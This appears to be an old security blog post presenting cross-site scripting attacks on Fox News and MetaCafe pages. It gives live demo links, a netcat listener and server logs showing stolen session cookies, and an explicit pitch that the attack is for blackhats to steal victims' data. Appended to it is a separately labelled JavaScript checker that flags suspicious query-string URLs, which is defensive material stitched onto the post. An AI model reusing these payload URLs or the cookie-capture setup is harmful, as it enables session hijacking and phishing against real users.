<div><a href="http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&amp;%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!">
Foxnews 0day XSS Shock Attack<br></a><br><font size="4">Demo link to send to a fish:<br><br><a href="http://www.foxnews.com/video2/launchPage.html?http://localhost/">http://www.foxnews.com/video2/launchPage.html?http://localhost/
</a><br><br>With netcat listening on localhost:</font><br><br>listening on [any] 80 ...<br>connect to localhost [<a href="http://127.0.0.1">127.0.0.1</a>] from localhost [<a href="http://127.0.0.1">127.0.0.1</a>] 1964<br>GET /E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D
<br>http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%<br>2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P<br>age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
<br>2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1<br>Host: <a href="http://pix01.revsci.net">pix01.revsci.net</a><br>User-Agent: Mozilla/5.0 (Mandriver)<br>Accept: image/png,*/*;q=0.5<br>Accept-Language: en-us,en;q=0.5<br>
Accept-Encoding: gzip,deflate<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: 300<br>Connection: keep-alive<br>Referer: <a href="http://www.foxnews.com/video2/launchPage.html?http://localhost">http://www.foxnews.com/video2/launchPage.html?http://localhost
</a><br><strong>Cookie: NETID01=9mWO-Ar@1RoAAAm1AWEAAAC5; NETSEGS_J05532=960C7930BE970CE4&amp;J05532<br>&amp;3F149836&amp;472757D9&amp;0&amp;&amp;4723FE85&amp;C2C6A1738F3B885FCA46DE74CFF355ED</strong><br><br><br>I think maybe this is to make many shock waves with XSS!
</div>
<div>
<h3 class="storytitle"><a title="Permanent Link: Zero Day Shockwave SWF Player Exploit with XSS Attack" href="http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/" rel="bookmark">Zero Day Shockwave SWF Player Exploit with XSS Attack
</a></h3>
<h3 class="storytitle"><br><font size="2">In hacking MetaCafe we discovered a Shockwave XSS 0day attack for use by blackhats to steal fish:<br><br>MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC:<br></font>
<br><font size="1"><a href="http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&amp;mediaURL=http://xssworm.com/?fish&amp;normalizedTitle=space_trip&amp;isViral=false&amp;isWatermarked=false&amp;postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&amp;networkingAllowed=true">
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&amp;mediaURL=http://xssworm.com/?fish&amp;normalizedTitle=space_trip&amp;isViral=false&amp;isWatermarked=false&amp;postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&amp;networkingAllowed=true
</a>&amp;<br><br></font>We see this output in the <a href="http://xssworm.com">xssworm.com</a> log:<br><br><br><font size="1">GET /crossdomain.xml HTTP/1.1<br>Host: <a href="http://metacafe.122.2o7.net">metacafe.122.2o7.net
</a><br>Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0<br>D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[<br>CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE] s_vi
<br>_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....<br><br>snips…<br><br></font>We see many more serious vulnerabilities in the web 2.0 today. You must be sure to visit the <a href="http://xssworm.com/">http://xssworm.com/</a> security portal to discuss this shock problem &amp;&amp; many thanks for your reply. I am interested.
<br><br>*vaj<br><br><br><font face="courier new,monospace" size="1">-- <br>Francesco Vaj [CISSP - GIAC]<br>CSS Security Researcher<br>mailto:<a href="mailto:vaj@nospam.xssworm.com">vaj@nospam.xssworm.com</a><br>aim: XSS Cross Site 
<br>------<br>XSS Cross Site Scripting Attacks and<br>Web 2.0 AJAX Security Information News -<br><a href="http://xssworm.com/">http://xssworm.com/</a><br>------<br>&quot;Vaj, bella vaj.&quot;<br></font></h3></div>
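Both demo links in the post carry an absolute URL inside the query string (a bare value in one, the `mediaURL` parameter in the other), and the first link's payload is double percent-encoded markup. The following is an added example, not part of the original post, of a log-review check that flags such request URLs; the allowlist, function names and sample URLs are assumptions constructed for illustration.

```javascript
// Added example, not code from the original post. The allowlist is an assumption.
const ALLOWED_HOST_SUFFIXES = ["example.com"];
// Percent-decode repeatedly (bounded) so double-encoded input such as
// %253Ch1%253E is inspected in the form a later decoding step would produce.
function decodeLayers(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

function hostAllowed(host) {
  const h = host.toLowerCase();
  return ALLOWED_HOST_SUFFIXES.some((s) => h === s || h.endsWith("." + s));
}

// Returns one finding {param, reason, value} per suspicious query-string part.
function inspectQuery(requestUrl) {
  const findings = [];
  const query = new URL(requestUrl).search.slice(1);
  for (const part of query.split("&").filter(Boolean)) {
    const eq = part.indexOf("=");
    // A part without "=" (launchPage.html?http://...) is a bare value.
    const param = eq === -1 ? "(bare)" : decodeLayers(part.slice(0, eq));
    const value = decodeLayers(eq === -1 ? part : part.slice(eq + 1));
    if (/[<>"']/.test(param + value)) {
      findings.push({ param, reason: "markup", value });
      continue;
    }
    // Absolute or protocol-relative URL: pull out the authority, drop
    // userinfo and port, then compare the host with the allowlist.
    const m = /^(?:[a-z][a-z0-9+.-]*:)?[\/\\]{2}([^\/\\?#]+)/i.exec(value);
    if (!m) continue;
    const host = m[1].split("@").pop().split(":")[0];
    if (!hostAllowed(host)) findings.push({ param, reason: "offsite-url", value });
  }
  return findings;
}

// Constructed samples modelled on the two demo links in the post.
const SAMPLES = [
  "http://www.example.com/video2/launchPage.html?http://localhost/",
  "http://www.example.com/f/fvp/player.swf?itemID=755028&mediaURL=http://other.example/?fish",
];
for (const s of SAMPLES) console.log(s, inspectQuery(s));
```

The same function can be applied at request time to reject the request instead of only reporting it.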